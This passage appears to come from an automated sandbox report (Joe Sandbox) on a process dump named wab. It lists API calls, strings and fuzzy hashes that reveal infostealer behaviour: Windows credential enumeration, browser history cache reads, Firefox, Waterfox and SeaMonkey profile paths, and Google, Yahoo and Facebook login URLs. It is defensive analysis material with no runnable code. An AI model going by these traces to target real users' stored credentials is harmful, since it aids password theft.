                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                          • API String ID: 2941347001-70141382
                                          • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                          • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                          • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                          • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

Control-flow Graph

• Graph image not reproduced; its nodes cover the basic blocks from 4466f4 through 4468dd.
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                          • String ID:
                                          • API String ID: 2827331108-0
                                          • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                          • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                          Control-flow Graph

                                          APIs
                                          • memset.MSVCRT ref: 0040C298
                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                          • wcschr.MSVCRT ref: 0040C324
                                          • wcschr.MSVCRT ref: 0040C344
                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                          • GetLastError.KERNEL32 ref: 0040C373
                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                          • String ID: visited:
                                          • API String ID: 1157525455-1702587658
                                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

Control-flow Graph

• Graph image not reproduced; its nodes cover the basic blocks from 40e175 through 40e2a8.
                                          APIs
                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                          • memset.MSVCRT ref: 0040E1BD
                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                          • _snwprintf.MSVCRT ref: 0040E257
                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                          • API String ID: 3883404497-2982631422
                                          • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                          • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                            • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                          • memset.MSVCRT ref: 0040BC75
                                          • memset.MSVCRT ref: 0040BC8C
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                          • memcmp.MSVCRT ref: 0040BCD6
                                          • memcpy.MSVCRT ref: 0040BD2B
                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                          • String ID:
                                          • API String ID: 509814883-3916222277
                                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

Control-flow Graph

• Graph image not reproduced; its nodes cover the basic blocks from 41837f through 41851d.
                                          APIs
                                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                          • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                          • GetLastError.KERNEL32 ref: 0041847E
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: CreateFile$??3@ErrorLast
                                          • String ID: |A
                                          • API String ID: 1407640353-1717621600
                                          • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                          • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                          • String ID: r!A
                                          • API String ID: 2791114272-628097481
                                          • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                          • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                          APIs
                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                          • _wcslwr.MSVCRT ref: 0040C817
                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                          • wcslen.MSVCRT ref: 0040C82C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                          • API String ID: 62308376-4196376884
                                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                          APIs
                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                          • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                          • wcslen.MSVCRT ref: 0040BE06
                                          • _wcsncoll.MSVCRT ref: 0040BE38
                                          • memset.MSVCRT ref: 0040BE91
                                          • memcpy.MSVCRT ref: 0040BEB2
                                          • _wcsnicmp.MSVCRT ref: 0040BEFC
                                          • wcschr.MSVCRT ref: 0040BF24
                                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                          • String ID:
                                          • API String ID: 3191383707-0
                                          • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                          • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                          • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                          • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                          APIs
                                          • memset.MSVCRT ref: 00403CBF
                                          • memset.MSVCRT ref: 00403CD4
                                          • memset.MSVCRT ref: 00403CE9
                                          • memset.MSVCRT ref: 00403CFE
                                          • memset.MSVCRT ref: 00403D13
                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                          • memset.MSVCRT ref: 00403DDA
                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                          • String ID: Waterfox$Waterfox\Profiles
                                          • API String ID: 3527940856-11920434
                                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                          APIs
                                          • memset.MSVCRT ref: 00403E50
                                          • memset.MSVCRT ref: 00403E65
                                          • memset.MSVCRT ref: 00403E7A
                                          • memset.MSVCRT ref: 00403E8F
                                          • memset.MSVCRT ref: 00403EA4
                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                          • memset.MSVCRT ref: 00403F6B
                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                          • API String ID: 3527940856-2068335096
                                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                          APIs
                                          • memset.MSVCRT ref: 00403FE1
                                          • memset.MSVCRT ref: 00403FF6
                                          • memset.MSVCRT ref: 0040400B
                                          • memset.MSVCRT ref: 00404020
                                          • memset.MSVCRT ref: 00404035
                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                          • memset.MSVCRT ref: 004040FC
                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                          • API String ID: 3527940856-3369679110
                                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                          • API String ID: 3510742995-2641926074
                                          • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                          • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                          APIs
                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                          • memset.MSVCRT ref: 004033B7
                                          • memcpy.MSVCRT ref: 004033D0
                                          • wcscmp.MSVCRT ref: 004033FC
                                          • _wcsicmp.MSVCRT ref: 00403439
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                          • String ID: $0.@
                                          • API String ID: 3030842498-1896041820
                                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                          APIs
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                          • String ID:
                                          • API String ID: 2941347001-0
                                          • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                          • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                          • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                          • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                          APIs
                                          • memset.MSVCRT ref: 00403C09
                                          • memset.MSVCRT ref: 00403C1E
                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                          • wcscat.MSVCRT ref: 00403C47
                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                          • wcscat.MSVCRT ref: 00403C70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memsetwcscat$Closewcscpywcslen
                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                          • API String ID: 3249829328-1174173950
                                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                          APIs
                                          • memset.MSVCRT ref: 0040A824
                                          • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                          • wcscpy.MSVCRT ref: 0040A854
                                          • wcscat.MSVCRT ref: 0040A86A
                                          • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                          • String ID:
                                          • API String ID: 669240632-0
                                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                          APIs
                                          • wcschr.MSVCRT ref: 00414458
                                          • _snwprintf.MSVCRT ref: 0041447D
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                          • String ID: "%s"
